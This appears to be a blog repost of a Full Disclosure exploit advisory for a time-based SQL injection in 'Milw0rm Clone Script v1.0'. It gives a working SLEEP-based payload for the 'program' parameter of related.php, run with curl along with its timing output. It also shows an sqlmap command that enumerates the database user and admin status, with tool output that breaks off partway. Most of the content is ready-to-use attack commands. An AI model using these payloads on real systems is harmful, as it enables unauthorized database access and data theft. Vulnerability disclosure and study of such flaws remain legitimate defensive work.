Latest YouTube Video

Tuesday, May 19, 2015

[FD] Milw0rm Clone Script v1.0 - (time based) SQLi

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> |   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       | |            Date: 05.19.2015                                                          | |   Exploit Daddy: pancaker                                                            | | Vendor Homepage: http://ift.tt/1FsVNKK | |   Software Link: http://ift.tt/1PUKgW4 | |         Version: v1.0                                                                | |       Tested On: Ubuntu 10.04                                                        | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| |   SHOUTout: milw0rm &&& your mums pancakes                                           | | CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez  related.php ### ..zzz... ### manual ### root@woop:~# zzz='10' root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit" root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz" real    0m10.008s user    0m0.004s sys    0m0.004s ### sqlmap ### root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba          _  ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf} |_ -| . | |     | .'| . | |___|_  |_|_|_|_|__,|  _|       |_|           |_|   http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:46:53 [09:46:53] [INFO] resuming back-end DBMS 'mysql' [09:46:53] [INFO] testing connection to the target URL [09:46:53] [INFO] heuristics detected web page charset 'UTF-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Source: Gmail -> IFTTT-> Blogger

No comments: